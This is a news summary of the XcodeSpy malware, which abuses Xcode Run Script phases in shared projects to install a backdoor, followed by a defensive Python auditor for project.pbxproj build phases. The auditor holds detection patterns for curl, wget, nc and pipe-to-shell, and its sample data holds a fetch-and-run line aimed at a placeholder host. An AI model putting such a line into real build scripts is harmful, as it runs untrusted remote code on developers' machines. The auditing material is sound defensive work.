"New Malware Uses Malicious Xcode Project to Install Backdoors on Developer Macs"
Security researchers at SentinelLabs have discovered a new malware called XcodeSpy that targets Xcode developers. XcodeSpy impacts the Xcode integrated development environment (IDE) on macOS. Xcode is a coding platform that allows developers to create Apple Store applications for iPhone, Mac, and other Apple devices. According to the researchers, malicious actors are abusing the IDE's Run Script feature to infect those using shared Xcode projects. They discovered a trojanized version of the legitimate iOS TabBarInjection Xcode project. When the project is downloaded and launched, it installs a custom variant of the EggShell backdoor that allows attackers to upload files, download files, record a victim's microphone, and more. This article continues to discuss the capabilities, distribution, targets, and potential impact of the new XcodeSpy malware.
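Because the infection path described above is a Run Script build phase inside a shared project, a reviewer can list every such phase before opening the project in Xcode. The following is an added example, not code from SentinelLabs or the original article: it reads the text of a `project.pbxproj` file, extracts each `PBXShellScriptBuildPhase`, and applies a few heuristic flags. The heuristics, the function names and the sample project text are assumptions constructed for illustration.

```python
import re

# Heuristics are assumptions chosen for this example, not indicators from the report.
HEURISTICS = {
    "network fetch": re.compile(r"\b(curl|wget|nc)\b"),
    "pipes into a shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "encoded or dynamic execution": re.compile(r"\b(base64|eval|osascript)\b"),
    "temp or hidden path": re.compile(r"/tmp/|/\.\w"),
}
# One object block per Run Script phase, ending at the line that closes it.
PHASE = re.compile(r"isa = PBXShellScriptBuildPhase;(.*?)^\s*\};", re.S | re.M)

def _value(key, body):
    """Return the plist value (quoted or bare) stored under key, unescaped."""
    m = re.search(r'^\s*' + key + r' = (?:"((?:[^"\\]|\\.)*)"|([^;\n]*));', body, re.M)
    if not m:
        return None
    if m.group(1) is None:
        return m.group(2)
    unesc = lambda e: {"n": "\n", "t": "\t"}.get(e.group(1), e.group(1))
    return re.sub(r"\\(.)", unesc, m.group(1))

def audit_run_scripts(pbxproj_text):
    """List every Run Script phase with its script body and heuristic flags."""
    findings = []
    for phase in PHASE.finditer(pbxproj_text):
        body = phase.group(1)
        script = _value("shellScript", body) or ""
        findings.append({
            "name": _value("name", body) or "(unnamed)",
            "shell": _value("shellPath", body),
            "script": script,
            "flags": [label for label, rx in HEURISTICS.items() if rx.search(script)],
        })
    return findings

# Constructed sample input: one ordinary lint phase and one phase worth a closer look.
SAMPLE = r'''
		AA11 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			name = Lint;
			shellPath = /bin/sh;
			shellScript = "if which swiftlint >/dev/null; then\n  swiftlint\nfi\n";
		};
		BB22 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/bash;
			shellScript = "curl -fsSL \"https://example.invalid/a.sh\" | sh\n";
		};
'''

if __name__ == "__main__":
    for f in audit_run_scripts(SAMPLE):
        print(f["name"], f["shell"], f["flags"] or "no flags", sep=" | ")
```

A phase with no flags is not proof that it is safe; the listing is meant to put every script body in front of a human reviewer.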